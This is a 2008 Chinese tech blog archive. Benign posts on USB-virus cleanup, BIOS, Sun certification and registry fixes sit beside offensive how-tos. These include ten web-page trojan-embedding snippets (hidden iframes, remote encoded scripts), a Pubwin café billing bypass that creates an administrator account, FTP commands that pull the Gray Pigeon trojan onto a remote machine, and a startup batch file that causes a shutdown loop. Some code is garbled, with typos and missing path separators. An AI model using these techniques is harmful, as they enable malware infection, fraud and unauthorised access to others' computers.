![]() |
|
巧用批处理清除闪存盘病毒
作者:1 日期:2008-03-08 20:17
巧用批处理清除闪存盘病毒
现在闪存盘病毒很厉害,一旦电脑中招,会在其他盘根目录生成自动运行的autorun.inf文件以及病毒文件
*.exe或*.pif等等.电脑就算在C盘运行了即时恢复,如果在电脑启动后不小心双击其他盘符,病毒文件还会
进入系统中.
一个清除闪存盘病毒的批处理文件,利用它就可以快速地删除病毒文件.
批量代理代码如下所示:
@echo off
cakk attrib -h -r -s d:*.*
call attrib -h -r -s e:*.*
call del d:*.inf
call del d:*.exe
call del d:*.pif
call del e:*.inf
call del e:*.exe
call del e:*.pif
call exit
把这个批量处理文件随便取个名字,进入带启动中,每次启动后,都会删除其他盘跟目录下的这些文件,
如果发现有新的他类型文件,可以添加到批处理文件里面.
最新网页挂木马方法出现
作者:1 日期:2008-03-08 07:13
最新网页挂木马方法出现
页上内嵌木马是最近黑客传播病毒的一种新手法,不过根据以前的经验,用户对这种方式的病毒已有防范准备。如今黑客再出新招,针对网页挂木马又推出了一些新的应用方式。以下就是总结出的最常使用的挂马方式,提醒广大用户小心。
一:框架挂马
以下是代码片段:
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码 以下是代码片段:
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
以下是代码片段:
<script language=javascript src=xxx.js></script>
三:js变形加密
以下是代码片段:
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马 以下是代码片段:
<body >木马</body>
五:隐蔽挂马
以下是代码片段:
top.document.body.innerHTML = top.document.body.innerHTML + '
<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:CSs中挂马
以下是代码片段:
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
以下是代码片段:
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
以下是代码片段:
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
以下是代码片段:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
以下是代码片段:
<a href="http://www.77119.com(迷惑连接地址,显示这个地址指向木马地址)" >
页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_77119_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=
no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,
top=10");
}
</SCRIPT>
SUN认证基本知识
作者:1 日期:2008-03-02 09:33
| ||
| Sun公司简介 太阳微系统公司(Sun Microsystems,简称Sun)在自己的广告中宣称:我们就是.com前面那一点(We are the dot in the .com),这并非大言不惭----如果你充分了解Sun公司的历史以及现状。 Sun起初由包括Scott McNealy(现任Sun公司首席执行官)等4名在Stanford大学和加州大学Berkeley分校上学的研究生创建,1982年2月正式注册,先以工作站的设计制作为业务重点,6个月后开始创收盈利。Sun公司的名称,实际为Stanford University Network3个英文单词首写字母之缩略,中文意为:斯坦福大学网络,而跟太阳没有任何关系。 有趣的是,在合力发起Sun的团队中,唯一的技术人员—--比尔·乔伊(Bill Joy,现在为Sun公司的首席科学家)在此之前是阿帕网雇用的一名黑客。这也许为Sun的技术开发定了一个基调,直到现在,Sun一直在计算机边缘(也可以说成是尖端)技术处于领先地位。他们利用原贝尔试验室开发的Unix作平台,以全面开放的概念、对新技术的不懈追求和对用户要求的积极响应,创出了一条成功之路,为世人所称道。 从公司成立开始,Sun就提出了“The Network is the computer—--网络就是计算机”这一见解独特的口号。从那时起,Sun一直致力于发展网络计算技术、产品与服务,主要包括大型计算机系统、服务器、工作站操作系统和企业级网络计算软件。特别是Unixl作站/服务器在中国大陆市场名列第一,市场份额超过30%,在香港占有率更高达52%。Sun公司的产品和技术主要适用于电信、制造、运输、政府、教育、石油及一般商业和分销行业等重要领域。 在1995年,Sun推出了它有史以来最有影响和震撼力的产品—--Java。Java技术一经推出,就以其独有的开放性、跨平台性和面向网络的交互性迅速席卷全球,以其安全性、易用性和开发周期短的特点,迅速从最初的编程语言发展成为全球第二大软件开发平台。这些优点已引起世界计算机界的极大关注,Java公用规范(PAS)已被国际标准化组织(ISO)认定,Java技术已被列为当今世界信息技术三大要点之一。 Sun认证的种类 为了给业界建立一套认证的标准,Sun公司推出了Java以及Solaris技术认证方案。对于企业而言,可以借助这项认证作为招聘人才的评判标准,或是作为衡量员工技术水准的依据;在个人方面,通过这些认证也可以证明个人的技术能力。目前Sun在中国推出的认证考试项目如下(在全球范围中的要多一些,具体可以参见http://suned.sun.com/certification.html): 1.Java认证考试 该认证主要面对Java程序员。同时,该认证是业界唯一经Sun授权的Java认证,考试内容涉及所有Java相关知识、编程概念及applet开发技巧。Sun认证Java程序员考试旨在观察您通过应用软件分配进行复杂编程的能力,之后还要测试您完成编程所需的知识。每次考试都包括65道以上的选择题,时间大约为90分钟。目前在这方面有两项认证:Sun Certified Java Programmer(SCJP)和 Sun Certified Java Developer 2. Solaris系统管理认证考试 对Solaris/Sun OS系统管理员,Sun推出Certified Solaris Administrator(CSA)。CSA分别为两个等级(Part Ⅰ和 Part Ⅱ),测试对Solaris系统管理的了解程度。 3. Solaris网络管理认证考试 为了测试使用者对于Solaris网络管理能力,Sun推出Certified Network Administrator(CNA)。内容包括基本网络概念、Routing and Subnet、Security、Performance、DNS、NIS+等。 通过SUN任何一门专业认证后,考生将收到SunMicrosystems总公司寄发的资格证书及徽章,并有权将通过Sun认证的标记印在个人名片上,作为个人技术能力的肯定。 | ||
关于BIOS知识全攻略
作者:1 日期:2008-03-01 21:17
一 BIOS的基本概念
说到BIOS大家关注过它吗?其实每当你按下机箱上的power键时,它就认认真真的为你工作了。那么什么是BIOS呐?书本上给了我们一个定义:"BIOS是Basic Input-output System(基本输入输出系统)的缩写,它负责开机时对系统的各项硬件进行初始化设置和测试,以确保系统能够正常工作。若硬件不正常则立即停止工作,并把出错的设备信息反馈给用户。BIOS包含了系统加电自检(POST)程序模块、系统启动自举程序模块,这些程序模块主要负责主板与其它计算机硬件设备通讯的作用。"
简单的说BIOS就是被"固化"在计算机硬件中的一组程序,它为你的计算机提供最低级的、最直接的硬件控制。BIOS实际上相当于计算机硬件与软件程序之间的一座桥梁,它本身其实就是一个程序也可以说是一个软件。我们对它最直观的认识就是POST(Power On System Test)功能,当计算机接通电源后,BIOS将进行检验其内部所有设备的自检,包括对CPU、内存、只读存储器、系统主板、CMOS存储器、并行和串行通信子系统、软盘和硬盘子系统以及键盘进行测试。自检测试完成后,系统将在指定的驱动器中寻找操作系统,并向内存中装入操作系统。
二 CMOS是什么?
BIOS被存放在CMOS存储器中,CMOS是complementary metal-oxide semiconductor的首写字母缩写,中文就是互补金属氧化物半导体,它是一种半导体技术,可以将成对的金属氧化物半导体场效应晶体管(MOSFET)集成在一块硅片上。该技术通常用于生产RAM和交换应用系统,用它生产出来的产品速度很快功耗极低,而且对供电电源的干扰有较高的容限。具体到我们这是指电脑主机板上一块特殊的RAM芯片,这一小块RAM通常为128字节或256字节。CMOS RAM的作用是保存系统的硬件配置和用户对某些参数的设定。 sCL<9IS6
因为CMOS RAM的功耗极低,所以当系统电源关闭后CMOS RAM靠主板的后备电池供电就可以了,因此保存在CMOS内的用户设置参数不会丢失。CMOS RAM本身只是一块存储芯片,只有数据保存功能,而对CMOS中各项参数的设定要使用专门的程序。早期计算机的CMOS设置程序是保存在一张软盘上的,每次设置都要用那张软盘,很不方便。现在绝大多数厂家已将CMOS设置程序--即BIOS固化到了Flash EPROM芯片中,Flash EPROM芯片的容量一般为1MB、2MB ,现在有许多815E的板子到了4MB(4MB哈哈,可以放MM的照片了,一开机就显示MM的照片想想就觉得很CooL,不过开机Logo只有256色还是有点不爽)。为了便于察看BIOS的容量我们可以利用BIOS芯片上的型号来识别:像27C010、27C512等以"27"打头的芯片均是EPROM(486以及486以下的电脑采用的芯片),而28C010、29C010、29C020、29C040等,均为EEPROM,29C010是128K*8,即1M比特并行EEPROM,29C010是128K*8(1M比特),29C020是256K*8(2M比特)、29C040是512K*8(4M比特)的FLASH ROM(586以及pII,PIII档次的BIOS芯片)。串行EEPROM在计算机主板上较少见,而提供这些芯片的厂家多为MX、WINBOND、ATMEL等厂家。
三 BIOS的设置及其影响
目前使用广泛的主板BIOS主要来自三个公司: American Megatrends公司的AMI BIOS、Award公司的Award BIOS和Phoenix公司的Phoenix BIOS,早期486机上还有一些如Eurosoft公司的Euro BIOS和Microid Research公司的MR BIOS等。现在主板使用最普遍的是AWARD BIOS。另外还有少数主板使用AMI 的窗口化WinBIOS,WinBIOS在系统启动后会自动识别鼠标,当计算机上插有鼠标时,可以直接使用鼠标器进行BIOS设置操作。三种BIOS的进入方法也略有不同,AWARD BIOS和AMI BIOS是开机时按住键;Phoenix BIOS则是按键,还有一些BIOS视厂商不同进入方法也不一样,一般开机加电后屏幕左下角都会出现Press (具体主板具体分析) To Enter Setup。
CCNA网络入门基础(第一章)
作者:1 日期:2008-02-23 18:54
系统无法打开.exe可执行文件问题的解决方案
作者:1 日期:2008-02-17 21:35
解决方法:对于exe打开方式被木马或病毒修改,无法打开任何可执行文件的解决办法。
方案一:先将regedit.exe改名为regedit.com或regedit.scr。
运行regedit.com,找到hkey_classes_rootexefileshellOpencommand键值,将默认值改为%1 %*重启,再将regedit.com改回regedit.exe即可。
方案二:将下面的内容存为exefile.reg,双击导入注册表;或在纯dos下运行regedit exefile.reg,导入注册表即可。(注意:regedit4后面留一空行)
regedit4
[hkey_classes_rootexefileshellOpencommand]<br>@=\%1 %*
方案三(只适用于win2000/xp):
1、将cmd.exe改名为cmd.com或cmd.scr。
2、运行cmd.com
3、运行下面两个命令:ftype exefile=%1 %*assoc .exe=exefile
4、将cmd.com改回cmd.exe
方案四:从新关联EXE文件。打开任意窗口(非IE窗口),工具---文件夹选项----文件类型----新建————在“文件扩展名”中填入“EXE”-----点击高级,在下拉菜单中选“应用程序”-------确定。(转载)
pubwin网吧收费系统快速破解
作者:1 日期:2008-02-12 15:54
搜索 “pubwin.exe” 将程序剪切到其它地方(“pubwin.exe”的程序本身并没有禁掉“搜索”这一项)
若“ win” 键无法使用,可以用输入法漏洞找出 “pubwin.exe” CTRL+SHIFT快速切换输入法为”全拼”
调出输入法状态条 选择“帮助—输入法入门—选项—internet选项—设置—查看对象”接下来你知道怎么做了—搜索
第二步:搜索cmd 并运行,在命令行下建立个管理员用户(若有帐号跳过这一步)
net user fox fox /add
net localgroup administrators fox /add
第三步:注销 运行 cmd 命令,健入 shutdown –l (注意XP下才有的,所以教程针对XP系统)
接下来用你的帐号登陆系统就可以免费上网了
这个方法没实验,不知道行不行.
清除系统垃圾文件
作者:1 日期:2008-02-12 15:35
双击它就能很快地清理垃圾文件,大约一分钟不到。
@echo off
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%*.tmp
del /f /s /q %systemdrive%*._mp
del /f /s /q %systemdrive%*.log
del /f /s /q %systemdrive%*.gid
del /f /s /q %systemdrive%*.chk
del /f /s /q %systemdrive%*.old
del /f /s /q %systemdrive% ecycled*.*
del /f /s /q %windir%*.bak
del /f /s /q %windir%prefetch*.*
rd /s /q %windir% emp & md %windir% emp
del /f /q %userprofile%cookies*.*
del /f /q %userprofile% ecent*.*
del /f /s /q "%userprofile%Local SettingsTemporary Internet Files*.*"
del /f /s /q "%userprofile%Local SettingsTemp*.*"
del /f /s /q "%userprofile% ecent*.*"
echo 清除系统LJ完成!
echo. & pause
在远程计算机的CMD内下载FTP文件
作者:1 日期:2008-02-12 12:43
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如203.75.44.34
2、FTP服务器的用户名:如tty
3、FTP服务器的密 码:如tty123
在远程计算机的CMD下依次输入下面的命令:
1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器
2、echo tty>>tty.txt 用户名
3、echo tty123>>tty.txt 密码
4、echo bin>>tty.txt 开始
5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马
6、echo bye>>tty.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:
open 203.75.44.34
tty
tty123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:tty.txt 意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
del c: ty.txt
发几个害人的BAT 只学习啊
作者:1 日期:2008-02-12 12:29
发几个害人的BAT 只学习啊@echo off
title 你要over了!!!
cd C:Documents and Settings\%username%「开始」菜单程序启动
if exist 456.bat goto next
goto upover
:next
start 123.bat
:upover
echo shutdown -s -t 0 >456.bat
exit
将文件保存为123.bat,双击。。。.(原理很简单--调用自身)
伙计们,感觉如何,你的机器是不是很热,不得不重启,但是你的机器很快就陷入重启的循环中..........
解决问题:
找到123.bat 删除就搞定了.
这个东西的学习性大于实用性 呵呵
还有收藏的祝福 (代码太长了。。)(转载)








